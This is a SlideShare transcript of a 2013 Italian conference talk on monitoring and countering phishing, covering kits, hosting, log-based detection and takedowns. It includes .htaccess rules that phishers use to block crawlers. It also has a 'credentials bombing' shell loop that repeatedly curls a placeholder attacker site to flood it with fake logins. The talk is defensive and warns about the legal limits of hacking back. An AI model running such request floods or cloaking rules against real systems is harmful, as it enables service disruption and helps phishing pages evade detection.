SlideShare ist ein Scribd-Unternehmen logo
1 von 35
Downloaden Sie, um offline zu lesen
Phishing:
monitoraggio e contrasto.
I possibili approcci e le reali possibilitA'
Torino 30 maggio 2013
Denis Frati
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 1
Frode utenti Telepass
21-6-2012: 50 cc validi luhn
Frode utenti Poste Pay
14-11-2012: 17 cc validi luhn
Frode utenti PayPal 15-11-2012:
5 cc validi luhn
Frode Agip/Eni 19-11-2012: 17
cc validi luhn
Frode utenti Visa 20-11-2012:
23 cc validi luhn
ecc... ecc... ecc...

Il phishing non e' la truffa degli sciocchi!!

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 2

Il phishing non e' solo bancario – 1
(social network)

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 2

Il phishing non e' solo bancario – 2
(e-mail account)

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 2

Il phishing non e' solo bancario – 2
(On-line game)

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 3

… Se ne frega dell'otp

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 3

… Perche' gli bastano le carte di credito - 1

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 3

… Perche' gli bastano le
carte di credito - 2

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 3

… o l'accesso agli account in cui reperirle

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Generalita'
Il Phishing è:
●
●
●
●

di semplice attuazione;
poco dispendioso;
trans-frontaliero;
a basso rischio;

si avvantaggia di:
●
●
●

Denis Frati – D3Lab
Www.d3lab.net

ampio bacino vittime;
innumerevoli target;
pericolosità sottostimata;
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Di cosa necessita' il phisher ? - 1
- Il kit Kit di phishing:
l'insieme di pagine html/htm,
php ed immagini, riproducenti
quelle dell'ente target.
<--- li fanno e
li vendono

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Di cosa necessita' il phisher ? - 2
- liste di indirizzi mail & mail server Liste di indirizzi email a cui
inviare le mail fraudolente.
Sistema invio mail:
●
●
●
●

Denis Frati – D3Lab
Www.d3lab.net

mail sender php;
server di posta violati;
macchine compromesse;
connessioni wireless
aperta;
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Di cosa necessita' il phisher ? - 3
- SPAZIO di hosting Spazio di hosting:
●
●
●
●

Denis Frati – D3Lab
Www.d3lab.net

gratuito;
a pagamento;
sito violato;
sulla propria macchina +
dns dinamico;
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

FUNZIOnamento base

3

2
1

6

4
5
6

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Previsioni, preveggenza, vaticinio ???

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

monitoraggio
Undergorund & cyber crime intelligence

False pagine web on-line

Attack spread

Provenienza
Profili utente

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio
Undergorund & cyber crime intelligence
Tra il dire ed il fare …
sono necessari:
●
●
●
●
●
●
●

struttura;
risorse umane;
tempo
conoscenza degli “ambienti”
storico: profili, attività, partecipazioni, conoscenze
referenze;
ecc;

… non basta iscriversi ad un forum/blog underground,
frequentare saltuariamente un canale irc su un server .ru

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio
Presenza false pagine web on-line
●
●

●

●

il phishing è dinamico, veloce!
raramente sono presenti collegamenti a
pagine web indicizzate;
l'indicizzazione è spesso successiva alle prime
segnalazioni di frode;
il phisher conosce benissimo e usa:
➔
➔

robot.txt;
htaccess;

User-agent: *
Disallow: /folder1/
User-Agent: Googlebot
Disallow: /folder2/
RewriteEngine On
...
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot
RewriteRule ^.* - [F,L]

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio
ATTACK spread
●

falsificazione degli header della mail

Notifica mancati recapiti ->WARNING
un diluvio di notifiche che può anche mettere
in crisi il web server

Return-Path: <info@mycompany.it>
●

invio massiccio di mail anche a indirizzi
inesistenti

sono necessari:
●
monitoraggio data-base on line;
●
mail box civetta;
●
segnalatori (spesso i clienti verso filiali);
… buongiorno ho visto la mail per il concorso,
quello del bonus per la ricarica

addestrare il personale
a ricevere le segnalazioni

… scusi mi avete scritto per un mio conto ...ma
io non sono vostro cliente ….

Denis Frati – D3Lab
Www.d3lab.net

Scusi?? mi spieghi bene, …
…mi inoltri la mail,
…può inviarmi il sorgente della
mail?
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio
Monitorare la provenienza - 1
188.216.109.13 - - [25/May/2013:17:30:46 -0700] "GET /area_personale/login.php HTTP/1.1" 200 6820
"http://mycompany.victimsite.com.vn/area_personale/login.php" "Mozilla/6.0 (compatible; MSIE 7.03;
Windows ME) Opera 5.11 [en]"
Source Ip address: 188.216.109.13
Data: [25/May/2013:17:30:46 -0700]
Risorsa richiesta: "GET /area_personale/login.php HTTP/1.1"
Risposta server: 200 6820
Referer: "http://mycompany.victimsite.com.vn/area_personale/login.php"
User Agent: "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]"
from http://httpd.apache.org/docs/2.2/logs.html

la vittima viene rimandata a specifiche pagine legittime;
noti i referer legittimi evidenzio richieste con referer non trusted (no IT, no
*.mycompany.com, ecc..)

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Dal Monitoraggio al contrasto
Attraverso Monitoraggio provenienza
referer pericoloso
su pagina login

azioni di verifica diretta

identifico
cliente

confronto profilo cliente
ulteriori verifiche

rilevo IP possibile
vittima

Frode ?

Y
fatto login ?
N

Y
blocco account
blocco operatività

1- test security company, curiosi, casuale, ecc
2- cliente che non prosegue con login

Denis Frati – D3Lab
Www.d3lab.net

N

Evento >> log.db
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
Richieste shutdown
Eliminare le pagine web fraudolente è imperativo, ma …
… realisticamente i mezzi sono pochi!
Si inoltrano le richieste a:
● gestori siti web;
● gestori server;
● hoster;
● fornitori connettività;
Tuttavia permangono problemi dovuti a:
● orari, fusi orari e festività;
● difficoltà contatto;
● servizi whois privacy;
● incomprensioni linguistiche;
● diffidenza;

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Contrasto - Richieste shutdown – PLAYNG WITH
redirect

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Contrasto - Richieste shutdown
PLAYNG WITH DYNAMIC DNS & fake sub domain
I servizi di DNS dinamico permettono al
criminale di:
● creare domini con nomi ingannevoli;
● mantenere le strutture/pagine web al
sicuro su proprie macchine connesse
in rete via SIM card
● celare la reale posizione delle pagine
- É necessario tracciare gli indirizzi IP
correlati ai domini
- intervenire
•
con corretti titolari degli IP
•
Fornitori servizio Dyn DNS

Il criminale:
● aggredisce il sito A;
● accede al pannello digestione
domini/DNS
● imposta subdomini con wild card;
● aggredisce il sito B
● inocula le pagine fraudolente
● dirotta su di esse i subdomini di A
www.post4.it.sitobucato.com
È necessario intervenire con tutte le
parti:
● gestori dei siti A & B
● hoster dei siti A & B
● fornitori connettività A & B;

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
Credentials bombing
Le credenziali rubate vengono:
● spedite via mail al criminale;
● scritte su file di testo (locali o remoti);
● scritte in db remoti;

Ehi Cattivo?!?! Vuoi le credenziali ???
Eccole!!
A=1
while [ $A -eq 1 ]
do
wget/curl http://attacksite.com/login.php?user&pass&pin
done

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
Credentials search
Se le credenziali sono scritte su file possono
essere individuate !!

Però lo sanno anche loro e
le scrivono in /tmp che
leggono via shell remote

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
kit search
L'individuazione del kit mi consente di
● Sapere dove (presumibilmente) finiscono
le credenziali;
● Profilare il possibile utilizzatore o autore
del kit;
● Conoscere la propria pagina da
monitorare nei log http per i referer non
trusted;
● Conoscere le proprie risorse (immagini,
applet flash, css, ecc...) usate dei
criminali per bloccarle;

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
I WANT TO BE BAD! - 1
Hai trovato una shell remota!!!
Grida di giubilio!!
Puoi entrare e sderenarli!!

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
I WANT TO BE BAD! - 2
Ricorda:
vuoi utilizzare exploit e shell remote come il phisher per contrastarlo?
Commetti almeno un reato
Art. 615 ter. C.p.(accesso abusivo a sistem informatico)
se non due
Art. 617 quinquies. C.p. (danneggiamento sistema informatico).
E le responsabilità aziendali ?!?!
Inoltre: le info eventualmente raccolte non sono “forensicaly sound” perché
acquisiste in modo illecito!

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
I WANT TO BE BAD! - 3
Ricorda:
puoi accedere (illecitamente) allo spazio usato dal criminale,
cancellare i suoi file, le pagine web fraudolente, ma …
… se la vulnerabilità che ha permesso l'accesso al criminale permane..
NON HAI RISOLTO MOLTO.
È probabile un successivo riutilizzo a fini fraudolenti del sito /server perché la
porta è ancora aperta!

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio & Analisi a tutto campo
Basi del contrasto
Un monitoraggio ampio e continuo
permette:
● Rilevare cambi di modalità operativa;
● Individuare nuove piattaforme bersaglio
per inoculazione;
● Conoscere nomi dei file di credenziali e
delle shell remote;
● Individuare i kit;
● Riconoscere la “firma” degli autori e
profilarli;
● Individuare nell'analisi attacchi a non
clienti tracce di attacco a clienti;
● Ipotizzare possibili futuri enti bersaglio.

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Previsioni, preveggenza, vaticinio ???
Il monitoraggio a largo raggio fornisce indicazioni
sugli orientamenti dei phisher:
es. agosto 2012 rilavati attacchi a EDF (fornitore
energia francese)
Fine 2012 attacchi a Gruppo, Agip/Eni
es. agosto 2012 attacchi BNP-PARIBAS (DE)
Autunno 2012 attacchi BNP-PARIBAS (IT)
Maggio 2013 attacchi BNP-PARIBAS (ES)
es:fine 2012 attacchi Deteuche Bank IT
1° quadr. 2013 attacchi Deteuche Bank (DE)
Phishing forecast: chi verrà attaccato nei prossimi giorni?
www.denisfrati.it/s?forecast :O ← analisi log http siti dei phisher

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
formazione
La (in)formazione del cliente può
avere un buon ritorno di immagine, a
costi contenuti.
Gli avvisi sulle pagine web non li
legge nessuno,ancor meno i deplian.
La formazione degli utenti interni, dei
dipendenti, porta solo sicurezza.
Kevin Mitnick parlava di formazione
aziendale a contrasto dall'ingegneria
sociale già nel 2002 (l'arte
dell'inganno).

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

domande

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Contatti:
d3lab ~ $ whois denisfrati
Registrant Info:
Registrant: denis frati
Mail address: info@d3lab.net
Company: D3Lab
Address: Ivrea (TO) – V. Jervis, 4
Phone: +39-0125-1963370
Fax: +39-0125-1963371
Compeny web site: www.d3lab.net
Personal web site: www.denisfrati.it
Expires on..............: never
Last modified on........: 2012-02-20

Denis Frati – D3Lab
Www.d3lab.net

Weitere ähnliche Inhalte

Ähnlich wie Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità

Cybercrime: investigazione forense e mitigazione (p.1)
Cybercrime: investigazione forense e mitigazione (p.1)Cybercrime: investigazione forense e mitigazione (p.1)
Cybercrime: investigazione forense e mitigazione (p.1)Massimo Farina
 
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Gianfranco Tonello
 
APT, Social Network e Cybercriminali: Strategie difensive
APT, Social Network e Cybercriminali: Strategie difensiveAPT, Social Network e Cybercriminali: Strategie difensive
APT, Social Network e Cybercriminali: Strategie difensiveiDIALOGHI
 
Smau Bologna 2011 Gentili-Fratepietro cyberwar
Smau Bologna 2011 Gentili-Fratepietro cyberwarSmau Bologna 2011 Gentili-Fratepietro cyberwar
Smau Bologna 2011 Gentili-Fratepietro cyberwarSMAU
 
Pillole di Autodifesa Digitale - Protezione Social Network
Pillole di Autodifesa Digitale - Protezione Social Network Pillole di Autodifesa Digitale - Protezione Social Network
Pillole di Autodifesa Digitale - Protezione Social Network Pawel Zorzan Urban
 
social network e investigazione: alla ricerca del reo
social network e investigazione: alla ricerca del reosocial network e investigazione: alla ricerca del reo
social network e investigazione: alla ricerca del reodenis frati
 
La (cyber) security ha bisogno di norme
La (cyber) security ha bisogno di normeLa (cyber) security ha bisogno di norme
La (cyber) security ha bisogno di normeuninfoit
 
50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importante
50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importante50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importante
50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importanteLuca Moroni ✔✔
 
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...festival ICT 2016
 
Dagli alert alle denunce: il caso di Poste Italiane
Dagli alert alle denunce: il caso di Poste ItalianeDagli alert alle denunce: il caso di Poste Italiane
Dagli alert alle denunce: il caso di Poste Italianearmandoleotta
 
Crimini Informatici 2012
Crimini Informatici 2012Crimini Informatici 2012
Crimini Informatici 2012Gianni Amato
 
Summary of “Dirty Clicks: A Study of the Usability and Security Implications ...
Summary of “Dirty Clicks: A Study of the Usability and Security Implications ...Summary of “Dirty Clicks: A Study of the Usability and Security Implications ...
Summary of “Dirty Clicks: A Study of the Usability and Security Implications ...EfremCherin
 
Nella mente dell'hacker: da Wargames all'Underground Economy
Nella mente dell'hacker: da Wargames all'Underground EconomyNella mente dell'hacker: da Wargames all'Underground Economy
Nella mente dell'hacker: da Wargames all'Underground Economymadero
 
Webinar 2020.04.07- Pillole di sicurezza digitale
Webinar 2020.04.07- Pillole di sicurezza digitaleWebinar 2020.04.07- Pillole di sicurezza digitale
Webinar 2020.04.07- Pillole di sicurezza digitaleMario Rossano
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!Andrea Draghetti
 
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...Ugo Lopez
 
Workshop sicurezza verbania
Workshop sicurezza verbaniaWorkshop sicurezza verbania
Workshop sicurezza verbaniaoscar badoino
 
Open Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioOpen Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioGianni Amato
 
Personal Cybersecurity
Personal CybersecurityPersonal Cybersecurity
Personal CybersecurityUgo Micci
 

Ähnlich wie Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità (20)

Cybercrime: investigazione forense e mitigazione (p.1)
Cybercrime: investigazione forense e mitigazione (p.1)Cybercrime: investigazione forense e mitigazione (p.1)
Cybercrime: investigazione forense e mitigazione (p.1)
 
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si ...
 
APT, Social Network e Cybercriminali: Strategie difensive
APT, Social Network e Cybercriminali: Strategie difensiveAPT, Social Network e Cybercriminali: Strategie difensive
APT, Social Network e Cybercriminali: Strategie difensive
 
Smau Bologna 2011 Gentili-Fratepietro cyberwar
Smau Bologna 2011 Gentili-Fratepietro cyberwarSmau Bologna 2011 Gentili-Fratepietro cyberwar
Smau Bologna 2011 Gentili-Fratepietro cyberwar
 
Pirateria Online
Pirateria OnlinePirateria Online
Pirateria Online
 
Pillole di Autodifesa Digitale - Protezione Social Network
Pillole di Autodifesa Digitale - Protezione Social Network Pillole di Autodifesa Digitale - Protezione Social Network
Pillole di Autodifesa Digitale - Protezione Social Network
 
social network e investigazione: alla ricerca del reo
social network e investigazione: alla ricerca del reosocial network e investigazione: alla ricerca del reo
social network e investigazione: alla ricerca del reo
 
La (cyber) security ha bisogno di norme
La (cyber) security ha bisogno di normeLa (cyber) security ha bisogno di norme
La (cyber) security ha bisogno di norme
 
50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importante
50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importante50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importante
50 Anni Liceo Tron Schio. Cos'è la Cyber Security e perchè è così importante
 
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
festival ICT 2013: Tra imbarazzi e perdite economiche: un anno di violazioni ...
 
Dagli alert alle denunce: il caso di Poste Italiane
Dagli alert alle denunce: il caso di Poste ItalianeDagli alert alle denunce: il caso di Poste Italiane
Dagli alert alle denunce: il caso di Poste Italiane
 
Crimini Informatici 2012
Crimini Informatici 2012Crimini Informatici 2012
Crimini Informatici 2012
 
Summary of “Dirty Clicks: A Study of the Usability and Security Implications ...
Summary of “Dirty Clicks: A Study of the Usability and Security Implications ...Summary of “Dirty Clicks: A Study of the Usability and Security Implications ...
Summary of “Dirty Clicks: A Study of the Usability and Security Implications ...
 
Nella mente dell'hacker: da Wargames all'Underground Economy
Nella mente dell'hacker: da Wargames all'Underground EconomyNella mente dell'hacker: da Wargames all'Underground Economy
Nella mente dell'hacker: da Wargames all'Underground Economy
 
Webinar 2020.04.07- Pillole di sicurezza digitale
Webinar 2020.04.07- Pillole di sicurezza digitaleWebinar 2020.04.07- Pillole di sicurezza digitale
Webinar 2020.04.07- Pillole di sicurezza digitale
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!
 
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
 
Workshop sicurezza verbania
Workshop sicurezza verbaniaWorkshop sicurezza verbania
Workshop sicurezza verbania
 
Open Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggioOpen Source Intelligence come strumento di monitoraggio
Open Source Intelligence come strumento di monitoraggio
 
Personal Cybersecurity
Personal CybersecurityPersonal Cybersecurity
Personal Cybersecurity
 

Mehr von denis frati

Slide chivari 20130517
Slide chivari 20130517Slide chivari 20130517
Slide chivari 20130517denis frati
 
Phishing fast & furious
Phishing fast & furiousPhishing fast & furious
Phishing fast & furiousdenis frati
 
Identità digitali violate: Phishing
Identità digitali violate: PhishingIdentità digitali violate: Phishing
Identità digitali violate: Phishingdenis frati
 
Se il bit diventa strategia: tra Cybercrime, Cyberwar e Battlefiled Forensic
Se il bit diventa strategia: tra Cybercrime, Cyberwar e Battlefiled ForensicSe il bit diventa strategia: tra Cybercrime, Cyberwar e Battlefiled Forensic
Se il bit diventa strategia: tra Cybercrime, Cyberwar e Battlefiled Forensicdenis frati
 
Phishing: anatomia del fenomeno
Phishing: anatomia del fenomenoPhishing: anatomia del fenomeno
Phishing: anatomia del fenomenodenis frati
 
Computer Forensics e L.48/2008 - Avv. Giovanni battista Gallus
Computer Forensics e L.48/2008 - Avv. Giovanni battista GallusComputer Forensics e L.48/2008 - Avv. Giovanni battista Gallus
Computer Forensics e L.48/2008 - Avv. Giovanni battista Gallusdenis frati
 
CAINE una distribuzione GNU/Linux per la computer forensics
CAINE una distribuzione GNU/Linux per la computer forensicsCAINE una distribuzione GNU/Linux per la computer forensics
CAINE una distribuzione GNU/Linux per la computer forensicsdenis frati
 
Sfdumper e cugini
Sfdumper e cuginiSfdumper e cugini
Sfdumper e cuginidenis frati
 
Linux per la Computer Forensics: i motivi di una scelta
Linux per la Computer Forensics: i motivi di una sceltaLinux per la Computer Forensics: i motivi di una scelta
Linux per la Computer Forensics: i motivi di una sceltadenis frati
 
LA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e Giuridici
LA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e GiuridiciLA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e Giuridici
LA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e Giuridicidenis frati
 

Mehr von denis frati (10)

Slide chivari 20130517
Slide chivari 20130517Slide chivari 20130517
Slide chivari 20130517
 
Phishing fast & furious
Phishing fast & furiousPhishing fast & furious
Phishing fast & furious
 
Identità digitali violate: Phishing
Identità digitali violate: PhishingIdentità digitali violate: Phishing
Identità digitali violate: Phishing
 
Se il bit diventa strategia: tra Cybercrime, Cyberwar e Battlefiled Forensic
Se il bit diventa strategia: tra Cybercrime, Cyberwar e Battlefiled ForensicSe il bit diventa strategia: tra Cybercrime, Cyberwar e Battlefiled Forensic
Se il bit diventa strategia: tra Cybercrime, Cyberwar e Battlefiled Forensic
 
Phishing: anatomia del fenomeno
Phishing: anatomia del fenomenoPhishing: anatomia del fenomeno
Phishing: anatomia del fenomeno
 
Computer Forensics e L.48/2008 - Avv. Giovanni battista Gallus
Computer Forensics e L.48/2008 - Avv. Giovanni battista GallusComputer Forensics e L.48/2008 - Avv. Giovanni battista Gallus
Computer Forensics e L.48/2008 - Avv. Giovanni battista Gallus
 
CAINE una distribuzione GNU/Linux per la computer forensics
CAINE una distribuzione GNU/Linux per la computer forensicsCAINE una distribuzione GNU/Linux per la computer forensics
CAINE una distribuzione GNU/Linux per la computer forensics
 
Sfdumper e cugini
Sfdumper e cuginiSfdumper e cugini
Sfdumper e cugini
 
Linux per la Computer Forensics: i motivi di una scelta
Linux per la Computer Forensics: i motivi di una sceltaLinux per la Computer Forensics: i motivi di una scelta
Linux per la Computer Forensics: i motivi di una scelta
 
LA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e Giuridici
LA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e GiuridiciLA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e Giuridici
LA PROVA INFORMATICA NEL PROCESSO PENALE - Aspetti Tecnici e Giuridici
 

Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità

  • 1. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' Torino 30 maggio 2013 Denis Frati
  • 2. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 1 Frode utenti Telepass 21-6-2012: 50 cc validi luhn Frode utenti Poste Pay 14-11-2012: 17 cc validi luhn Frode utenti PayPal 15-11-2012: 5 cc validi luhn Frode Agip/Eni 19-11-2012: 17 cc validi luhn Frode utenti Visa 20-11-2012: 23 cc validi luhn ecc... ecc... ecc... Il phishing non e' la truffa degli sciocchi!! Denis Frati – D3Lab Www.d3lab.net
  • 3. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 2 Il phishing non e' solo bancario – 1 (social network) Denis Frati – D3Lab Www.d3lab.net
  • 4. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 2 Il phishing non e' solo bancario – 2 (e-mail account) Denis Frati – D3Lab Www.d3lab.net
  • 5. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 2 Il phishing non e' solo bancario – 2 (On-line game) Denis Frati – D3Lab Www.d3lab.net
  • 6. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 3 … Se ne frega dell'otp Denis Frati – D3Lab Www.d3lab.net
  • 7. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 3 … Perche' gli bastano le carte di credito - 1 Denis Frati – D3Lab Www.d3lab.net
  • 8. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 3 … Perche' gli bastano le carte di credito - 2 Denis Frati – D3Lab Www.d3lab.net
  • 9. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 3 … o l'accesso agli account in cui reperirle Denis Frati – D3Lab Www.d3lab.net
  • 10. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Generalita' Il Phishing è: ● ● ● ● di semplice attuazione; poco dispendioso; trans-frontaliero; a basso rischio; si avvantaggia di: ● ● ● Denis Frati – D3Lab Www.d3lab.net ampio bacino vittime; innumerevoli target; pericolosità sottostimata;
  • 11. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Di cosa necessita' il phisher ? - 1 - Il kit Kit di phishing: l'insieme di pagine html/htm, php ed immagini, riproducenti quelle dell'ente target. <--- li fanno e li vendono Denis Frati – D3Lab Www.d3lab.net
  • 12. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Di cosa necessita' il phisher ? - 2 - liste di indirizzi mail & mail server Liste di indirizzi email a cui inviare le mail fraudolente. Sistema invio mail: ● ● ● ● Denis Frati – D3Lab Www.d3lab.net mail sender php; server di posta violati; macchine compromesse; connessioni wireless aperta;
  • 13. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Di cosa necessita' il phisher ? - 3 - SPAZIO di hosting Spazio di hosting: ● ● ● ● Denis Frati – D3Lab Www.d3lab.net gratuito; a pagamento; sito violato; sulla propria macchina + dns dinamico;
  • 14. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 FUNZIOnamento base 3 2 1 6 4 5 6 Denis Frati – D3Lab Www.d3lab.net
